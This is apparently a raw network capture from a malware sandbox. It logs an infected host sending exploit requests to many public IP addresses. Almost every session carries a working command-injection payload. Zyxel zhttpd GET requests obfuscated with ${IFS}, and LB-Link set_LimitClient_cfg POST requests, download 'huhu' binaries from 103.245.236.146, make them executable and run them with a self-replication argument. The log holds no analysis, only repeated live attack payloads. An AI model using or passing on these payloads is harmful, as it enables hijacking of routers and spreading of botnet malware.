                                      Jan 19, 2024 17:29:34.822264910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5059192.168.2.1441894151.16.14.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.822316885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5060192.168.2.1441806199.126.213.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.822352886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5061192.168.2.1433880145.53.182.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.822401047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5062192.168.2.145848491.36.123.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.822449923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5063192.168.2.1456082213.247.184.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.822494984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5064192.168.2.144340035.30.223.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.822513103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5065192.168.2.1444662219.9.87.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.822576046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5066192.168.2.1445804174.140.69.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.822621107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5067192.168.2.145255452.225.20.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.826404095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5068192.168.2.1456912173.120.128.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.826430082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5069192.168.2.1435030109.17.146.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.826486111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5070192.168.2.1452728123.6.213.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.826536894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5071192.168.2.1448924190.248.79.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.826571941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5072192.168.2.143979061.163.181.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.826605082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5073192.168.2.145651213.201.41.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.826642036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5074192.168.2.143489027.129.39.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.826683044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5075192.168.2.1449292172.34.125.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.826731920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5076192.168.2.1460962182.26.197.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.826776028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5077192.168.2.145185264.227.193.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.826797962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5078192.168.2.144238464.255.67.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.826828003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5079192.168.2.143413414.88.162.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.826853037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5080192.168.2.145453278.221.90.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.826916933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5081192.168.2.1440048130.162.28.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.826946020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5082192.168.2.1457690199.165.188.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.827008963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5083192.168.2.1453376172.87.203.208080
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.335716963 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:39.516655922 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:45.660267115 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5084192.168.2.1451044184.151.234.1368080
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.412993908 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5085192.168.2.1433630118.58.236.1038080
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.442220926 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:35.729860067 CET103INHTTP/1.1 404 Not Found
                                      Content-Type: text/plain
                                      Content-Length: 30
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5086192.168.2.1433402152.35.7.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835082054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5087192.168.2.143924087.18.96.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835119963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5088192.168.2.1450642197.150.17.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835150003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5089192.168.2.1459930108.140.114.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835211039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5090192.168.2.144097283.145.110.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835241079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5091192.168.2.144639642.80.233.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835282087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5092192.168.2.145778496.65.165.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835319996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5093192.168.2.1444502184.40.196.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835362911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5094192.168.2.1455492210.33.56.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835402012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5095192.168.2.143332285.138.135.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835447073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5096192.168.2.1437674152.228.53.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835474014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5097192.168.2.145015614.73.45.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835536957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5098192.168.2.145742644.110.196.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835545063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5099192.168.2.145628459.104.38.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835606098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5100192.168.2.1456662131.75.55.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835640907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5101192.168.2.14435982.199.81.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835664034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5102192.168.2.145279058.96.119.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835716009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5103192.168.2.144745692.200.251.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835757971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5104192.168.2.144525037.247.75.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835781097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5105192.168.2.146091446.231.215.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835817099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5106192.168.2.1439390107.200.127.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835880995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5107192.168.2.144247695.155.75.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835911036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5108192.168.2.1444316211.0.203.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835952044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5109192.168.2.1456608168.138.176.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.835978031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5110192.168.2.1433066153.222.26.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836040974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5111192.168.2.1447528160.61.189.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836071014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5112192.168.2.143419223.141.94.97443
                                      TimestampBytes transferredDirectionData
